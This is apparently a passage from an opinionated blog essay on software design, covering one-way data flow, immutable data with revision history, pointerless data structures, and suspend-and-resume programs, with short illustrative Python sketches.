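The callback pass-through idea can be sketched in a few lines (names hypothetical): the child fires a callback blindly, and a parent can decorate a callback it received from its own parent before passing it down.

```python
# A child calls a callback without knowing who it's calling; the parent
# decorates a callback given to it before handing it down.

def child(on_click):
    on_click("child event")  # fires blindly, no knowledge of the parent

def parent(on_click):
    def decorated(event):
        on_click(f"parent saw: {event}")  # decorate, then pass through
    child(decorated)

events = []
parent(events.append)
```

The child never reaches up and mutates parent state directly; composition happens entirely in the wiring.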

You don't actually need to have one absolute Ur-Model. Rather the idea is separation of concerns along lines of where the data comes from and what it is going to be used for, all to ensure that change only flows in one direction.

The benefits are numerous because of what it enables: when you don't mutate state bidirectionally, your UI tree is also a data-dependency graph. This can be used to update the UI for you, requiring you to only declare what you want the end result to be. You don't need to orchestrate specific changes to and fro, which means a lot of state machines disappear from your code. Key here is the ability to efficiently check for changes, which is usually done using immutable data.
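The "efficiently check for changes" part is worth making concrete. With immutable updates, asking "did this part change?" is a cheap identity check, which is exactly what lets a framework skip untouched subtrees (sketch only; `update` is a stand-in, not a real library call):

```python
# With immutable updates, change detection is an identity check.

def update(model, key, value):
    return {**model, key: value}  # new dict; the old one is untouched

a = {"title": "x", "items": (1, 2)}
b = update(a, "title", "y")

unchanged = b["items"] is a["items"]  # physically shared: skip re-render
changed = b["title"] != a["title"]    # new value: re-derive this view
```

No deep comparison is needed: if a reference is the same object, nothing under it can have changed.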

The merit of this approach is most obvious once you've successfully built a complex UI with it. The discipline it enforces leads to more elegant and robust solutions, because it doesn't let you wire things up lazily. You must instead take the long way around, and design a source of truth in accordance with all its intended derivatives. This forces but also enables you to see the bigger picture. Suddenly features that seemed insurmountably complicated, because they cross-cut too many concerns, can just fall out naturally. The experience is very similar to Immediate Mode UI, only with the ability to decouple more and do async.

If you don't do this, you end up with the typical Object-Oriented system. Every object can be both an actor and can be mutually acted upon. It is normal and encouraged to create two-way interactions with them and link them into cycles. The resulting architecture diagrams will be full of unspecified bidirectional arrows that are difficult to trace, which obscure the actual flows being realized.

Unless they represent a reliable syncing protocol, bidirectional arrows are wishful thinking.

Immutable Data

Almost all data in a computer is stored on a mutable medium, be it a drive or RAM. As such, most introductions to immutable data will preface it by saying that it's kinda weird. Because once you create a piece of data, you never update it. You only make a new, altered copy. This seems like a waste of perfectly good storage, volatile or not, and contradicts every programming tutorial.

Because of this, it is mandatory to add that you can reduce the impact with data sharing. This produces a supposedly unintuitive copy-on-write system.
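Data sharing is less exotic than it sounds. A sketch with plain cons cells: prepending to an immutable list makes a new head, and everything after it is reused rather than copied.

```python
# Two immutable lists sharing a common tail: the "altered copy"
# only allocates a new head cell.

def cons(head, tail):
    return (head, tail)

shared = cons(2, cons(3, None))
old = cons(1, shared)
new = cons(0, shared)  # reuses the entire tail of the old list
```

The tail is one physical structure referenced twice, so the "wasteful copy" is a single small allocation.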

But there's a perfect parallel, and that's the pre-digital office. Back then, most information was kept on paper that was written, typed or printed. If a document had to be updated, it had to be amended or redone from scratch. Aside from very minor annotations or in-place corrections, changes were not possible. When you did redo a document, the old copy was either archived, or thrown away.

data sharing - copy on write

The perfectly mutable medium of computer memory is a blip, geologically speaking. It's easy to think it only has upsides, because it lets us recover freely from mistakes. Or so we think. But the same needs that gave us real life bureaucracy re-appear in digital form. Only it's much harder to re-introduce what came naturally offline.

Instead of thinking of mutable data as the default, I prefer to think of it as data that destroys its own paper trail. It shreds any evidence of the change and adjusts the scene of the crime so the past never happened. All edits are applied atomically, with zero allowances for delay, consideration, error or ambiguity. This transactional view of interacting with data is certainly appealing to systems administrators and high-performance fetishists, but it is a poor match for how people work with data in real life. We enter and update it incrementally, make adjustments and mistakes, and need to keep the drafts safe too. We need to sync between devices and across a night of sleep.

banksy self-shredding painting

Girl With Balloon aka The Self-shredding Painting (Banksy)

Storing your main project in a bunch of silicon that loses its state as soon as you turn off the power is inadvisable. This is why we have automated backups. Apple's Time Machine for instance turns your computer into a semi-immutable data store on a human time scale, garbage collected behind the scenes and after the fact. Past revisions of files are retained for as long as is practical, provided the app supports revision control. It even works without the backup drive actually hooked up, as it maintains a local cache of the most recent edits as space permits.

It's a significant feat of engineering, supported by a clever reinterpretation of what "free disk space" actually means. It allows you to Think Different™ about how data works on your computer. It doesn't just give you the peace of mind of short-term OS-wide undo. It means you can still go fish a crumpled piece of data out of the trash long after throwing banana peels and coke cans on top. And you can do it inline, inside the app you're using, using a UI that is only slightly over the top for what it does.

That is what immutable data gets you as an end-user, and it's the result of deciding not to mutate everything in place as if empty disk space is a precious commodity. The benefits can be enormous, for example that synchronization problems get turned into fetching problems. This is called a Git.

It's so good most developers would riot if they were forced to work without it, but almost none grant their own creations the same abilities.

Linus Torvalds

Git repositories are of course notorious for only growing bigger, never shrinking, but that is a long-standing bug if we're really honest. It seems pretty utopian to want a seamless universe of data, perfectly normalized by key in perpetuity, whether mutable or immutable. Falsehoods programmers believe about X is never wrong on a long enough time-scale, and you will need affordances to cushion that inevitable blow sooner or later.

One of those falsehoods is that when you link a piece of data from somewhere else, you always wish to keep that link live instead of snapshotting it, better known as Database Normalization. Given that screenshots of screenshots are now the most common type of picture on the web, aside from cats, we all know that's a lie. Old bills don't actually self-update after you move house. In fact if you squint hard "Print to PDF" looks a lot like compiling source code into a binary for normies, used for much the same reasons.

The analogy to a piece of paper is poignant to me, because you certainly feel it when you try to actually live off SaaS software meant to replicate business processes. Working with spreadsheets and PDFs on my own desktop is easier and faster than trying to use an average business solution designed for that purpose in the current year. Because they built a tool for what they thought people do, instead of what we actually do.

These apps often have immutability, but they use it wrong: they prevent you from changing something as a matter of policy, letting workflow concerns take precedence over an executive override. If e.g. law requires a paper trail, past versions can be archived. But they should let you continue to edit as much as you damn well want, saving in the background if appropriate. The exceptions that get this right can probably be counted on one hand.

Business processes are meant to enable business, not constrain it. Requiring that you only ever have one version of everything at any time does exactly that. Immutability with history is often a better solution, though not a miracle cure. Doing it well requires expert skill in drawing boundaries between your immutable blobs. It also creates a garbage problem and it won't be as fast as mutable in the short term. But in the long term it just might save someone a rewrite. It's rarely pretty when real world constraints collide with an ivory tower that had too many false assumptions baked into it.
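At its simplest, immutability with history is just an append-only list of revisions (a deliberately naive sketch; real systems add deduplication, boundaries between blobs, and garbage collection):

```python
# Immutability with history: edits always succeed by appending a new
# revision; policy (audit, archival) reads the trail afterwards.

history = []

def save(doc):
    history.append(dict(doc))  # never overwrite, only append
    return doc

save({"text": "draft 1"})
save({"text": "draft 2"})
```

The latest revision is what you display; the older ones are the paper trail, available for an executive override instead of a hard lock.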

Rolls containing Acts of Parliament in the Parliamentary Archives at Victoria Tower, Palace of Westminster

Parliamentary Archives at Victoria Tower – Palace of Westminster

Pointerless Data

Data structures in a systems language like C will usually refer to each other using memory pointers: these are raw 64-bit addresses pointing into the local machine's memory, obscured by virtualization. They reference memory pages that are allocated, with their specific numeric value meaningless and unpredictable.

This has a curious consequence: the most common form of working with data on a computer is one of the least useful encodings of that data imaginable. It cannot be used as-is on any other machine, or even the same machine later, unless loaded at exactly the same memory offset in the exact same environment.

Almost anything else, even in an obscure format, would have more general utility. Serializing and deserializing binary data is hence a major thing, which includes having to "fix" all the pointers, a problem that has generated at least 573 kiloyaks worth of shaving. This is strange because the solution is literally just adding or subtracting a number from a bunch of other numbers over and over.

Okay that's a lie. But what's true is that every pointer p in a linked data structure is really a base + i, with a base address that was determined once and won't change. Using pointers in your data structure means you sprinkle base + invisibly around your code and your data. You bake this value into countless repeated memory cells, which you then have to subtract later if you want to use their contents for outside purposes.

Due to dynamic memory allocation the base can vary for different parts of your linked data structure. You have to assume it's different per pointer, and manually collate and defragment all the individual parts to serialize something.

Pointers are popular because they are easy, they let you forget where exactly in memory your data sits. This is also their downside: not only have you encoded your data in the least repeatable form possible, but you put it where you don't have permission to search through all of it, add to it, or reorganize it. malloc doesn't set you free, it binds you.

But that's a design choice. If you work inside one contiguous memory space, you can replace pointers with just the relative offset i. The resulting data can be snapshotted as a whole and written to disk. In addition to pointerless, certain data structures can even be made offsetless.
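A sketch of what that looks like, using a Python list as the stand-in for one contiguous memory space: a linked list whose "pointers" are just indices into the same buffer, so the whole thing can be written to disk and reloaded at any base address with nothing to fix up.

```python
# A linked list in one contiguous buffer, with relative offsets
# instead of raw pointers. Each node is two slots:
# [value, index_of_next], where -1 terminates the list.

buffer = [
    10, 2,    # node at index 0: value 10, next node at index 2
    20, 4,    # node at index 2: value 20, next node at index 4
    30, -1,   # node at index 4: value 30, end of list
]

def walk(buf, i=0):
    out = []
    while i != -1:
        out.append(buf[i])
        i = buf[i + 1]
    return out
```

Serializing this structure is a plain byte copy of the buffer; no pointer fix-ups, no collation of fragments.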

For example, a flattened binary tree where the index of a node in a list determines its position in the tree, row by row. Children are found at 2*i and 2*i + 1. This can be used e.g. on GPUs and allows for very efficient traversal and updates. It's also CPU-cache friendly. This doesn't work well for arbitrary graphs, but is still a useful trick to have in your toolbox. In specific settings, pointerless or offsetless data structures can have significant benefits. The fact that it lets you treat data like data again, and just cargo it around wholesale without concern about the minutiae, enables a bunch of other options around it.
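Concretely, with 1-based indexing (slot 0 is padding to keep the arithmetic simple), no links are stored at all; the tree shape lives entirely in the index math:

```python
# A flattened binary tree: node i has children at 2*i and 2*i + 1.
# No pointers, no offsets; position in the list is position in the tree.

tree = [None, "a", "b", "c", "d", "e", "f", "g"]  # complete tree, depth 3

def children(i):
    return 2 * i, 2 * i + 1

def depth_first(i=1):
    if i >= len(tree):
        return []
    left, right = children(i)
    return [tree[i]] + depth_first(left) + depth_first(right)
```

Traversal is pure arithmetic on indices, which is why this layout is friendly to both GPUs and CPU caches.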

Binary Tree - Flattened

It's not a silver bullet because going pointerless can just shift the problem around in the real world. Your relative offsets can still have the same issue as before, because your actual problem was wrangling the data-graph itself. That is, all the bookkeeping of dependent changes when you edit, delete or reallocate. Unless you can tolerate arbitrary memory fragmentation and bloating, it's going to be a big hassle to make it all work well.

Something else is going on beyond just pointers. See, most data structures aren't really data structures at all. They're acceleration structures for data. They accelerate storage, querying and manipulation of data that was already shaped in a certain way.

The contents of a linked list are the same as that of a linear array, and they serialize to the exact same result. A linked list is just an array that has been atomized, tagged and sprayed across an undefined memory space when it was built or loaded.
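You can see this directly (a toy sketch: nested tuples standing in for heap-allocated nodes): flattening the linked list yields exactly the array, because the contents were never different to begin with.

```python
# A linked list and an array hold the same data; only the acceleration
# structure differs, and both serialize to the same result.

linked = (1, (2, (3, None)))  # atomized, tagged nodes
array = [1, 2, 3]             # the same contents, contiguous

def to_list(node):
    out = []
    while node is not None:
        out.append(node[0])
        node = node[1]
    return out
```

The structure you pick accelerates certain operations; the data itself is indifferent.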

Because of performance, we tend to use our acceleration structures as a stand-in for the original data, and manipulate that. But it's important to realize this is programmer laziness: it's only justified if all the code that needs to use that data has the same needs. For example, if one piece of code does insertions, but another needs random access, then neither an array nor linked list would win, and you need something else.

We can try to come up with ever-cleverer data structures to accommodate every imaginable use, and this is called a Postgres. It leads to a ritual called a Schema Design Meeting where a group of people with differently shaped pegs decide what shape the hole should be. Often you end up with a too-generic model that doesn't hold anything particularly well. All you needed was 1 linked list and 1 array containing the exact same data, and a function to convert one to the other, that you use maybe once or twice.

When a developer is having trouble maintaining consistency while coding data manipulations, that's usually because they're actually trying to update something that is both a source of truth and output derived from it, at the same time in the same place. Most of the time this is entirely avoidable. When you do need to do it, it is important to be aware that's what that is.

My advice is to not look for the perfect data structure which kills all birds with one stone, because this is called a Lisp and few people use it. Rather, accept the true meaning of diversity in software: you will have to wrangle different and incompatible approaches, transforming your data depending on context. You will need to rely on well-constructed adaptors that exist to allow one part to forget about most of the rest of the universe. It is best to become good at this and embrace it where you can.

As for handing your data to others, there is already a solution for that. They're called file formats, and they're a thing we used to have. Software used to be able to read many of them, and you could just combine any two tools that had the same ones. Without having to pay a subscription fee for the privilege, or use a bespoke one-time-use convertor. Obviously this was crazy.

These days we prefer to link our data and code using URLs, which is much better because web pages can change invisibly underneath you without any warning. You also can't get the old version back even if you liked it more or really needed it, because browsers have chronic amnesia. Unfortunately it upsets publishers and other copyright holders if anyone tries to change that, so we don't try.

squeak / smalltalk


Suspend and Resume

When you do have snapshottable data structures that can be copied in and out of memory wholesale, it leads to another question: can entire programs be made to work this way? Could they be suspended and resumed mid-operation, even transplanted or copied to another machine? Imagine if instead of a screenshot, a tester could send a process snapshot that can actually be resumed and inspected by a developer. Why did it ever only 'work on my machine'?

Obviously virtual machines exist, and so does wholesale-VM debugging. But on the process level, it's generally a non-starter, because sockets and files and drivers mess it up. External resources won't be tracked while suspended and will likely end up in an invalid state on resume. VMs have well-defined boundaries and well-defined hardware to emulate, whereas operating systems are a complete wild west.

It's worth considering the value of a paper trail here too. If I suspend a program while a socket is open, and then resume it, what does this actually mean? If it was a one-time request, like an HTTP GET or PUT, I will probably want to retry that request, if at all still relevant. Maybe I prefer to drop it as unimportant and make a newer, different request. If it was an ongoing connection like a WebSocket, I will want to re-establish it. Which is to say, if you told a network layer the reason for opening a socket, maybe it could safely abort and resume sockets for you, subject to one of several policies, and network programming could actually become pleasant.

Files can receive a similar treatment, to deal with the situation where they may have changed, been deleted, moved, etc. Knowing why a file was opened or being written to is required to do this right, and depends on the specific task being accomplished. Here too macOS deserves a shout-out, for being clever enough to realize that if a user moves a file, any application editing that file should switch to the new location as well.

Systems-level programmers tend to orchestrate such things by hand when needed, but the data flow in many cases is quite unidirectional. If a process, or a part of a process, could resume and reconnect with its resources according to prior declared intent, it would make a lot of state machines disappear.

It's not a coincidence this post started with React. Even those aware of it still don't quite realize React is not actually a thing to make web apps. It is an incremental job scheduler, for recursively expanding a tree in an asynchronous and rewindable fashion. It just happens to be built for SGML-like trees, and contains a bunch of legacy fixes for browsers. The pattern can be applied to many areas that are not UI and not web. If it sounds daunting to consider approaching resources this way, consider that people thought exactly the same about async I/O until someone made that pleasant enough.

However, doing this properly will probably require going back further than you think. For example, when you re-establish a socket, should you repeat and confirm the DNS lookup that gave you the IP in the first place? Maybe the user moved locations between suspending and resuming, so you want to reconnect to the nearest data center. Maybe there is no longer a need for the socket because the user went offline.

All of this is contextual, defined by policies informed by the real world. This class of software behavior is properly called etiquette. Like its real world counterpart it is extremely messy because it involves anticipating needs. Usually we only get it approximately right through a series of ad-hoc hacks to patch the worst annoyances. But it is eminently felt when you get such edge cases to work in a generic and reproducible fashion.

Mainly it requires treating policies as first class citizens in your designs and code. This can also lead you to perceive types in code in a different way. A common view is that a type constrains any code that refers to it. That is, types ensure your code only applies valid operations on the represented values. When types represent policies though, the perspective changes because such a type's purpose is not to constrain the code using it. Rather, it provides specific guarantees about the rules of the universe in which that code will be run.

This to me is the key to developer happiness. As opposed to, say, making tools to automate the refactoring of terrible code and make it bearable, but only just.

The key to end-user happiness is to make tools that enable an equivalent level of affordance and flexibility compared to what the developer needed while developing it.

* * *

When you look at code from a data-centric view, a lot of things start to look like stale or inconsistent data problems. I don't like using the word "cache" for this because it focuses on the negative, the absence of fresh input. The real issue is data dependencies, which are connections that must be maintained in order to present a cohesive view and cohesive behavior, derived from a changing input model. Which is still the most practical way of using a computer.

Most caching strategies, including 99% of those in HTTP, are entirely wrong. They fall into the give-up-and-pray category, where they assume the problem is intractable and don't try something that could actually work in all cases. Which, stating the obvious, is what you should actually aim for.

Often the real problem is that the architect's view of the problem is a tangled mess of boxes and arrows that point all over the place, with loopbacks and reversals, which makes it near-impossible to anticipate and cover all the applicable scenarios.

If there is one major thread running through this, it's that many currently accepted sane defaults really shouldn't be. In a world of terabyte laptops and gigabyte GPUs they look suspiciously like premature optimization. Many common assumptions deserve to be re-examined, at least if we want to adapt tools from the Offline Age to a networked day. We really don't need a glossier version of a Microsoft Office 95 wizard with a less useful file system.

We do need optimized code in our critical paths, but developer time is worth more than CPU time most everywhere else. Most of all, we need the ambition to build complete tools and the humility to grant our users access on an equal footing, instead of hoarding the goods.

The argument against these practices is usually that they lead to bloat and inefficiency. Which is definitely true. Yet even though our industry has not adopted them much at all, the software already comes out orders of magnitude bigger and slower than before. Would it really be worse?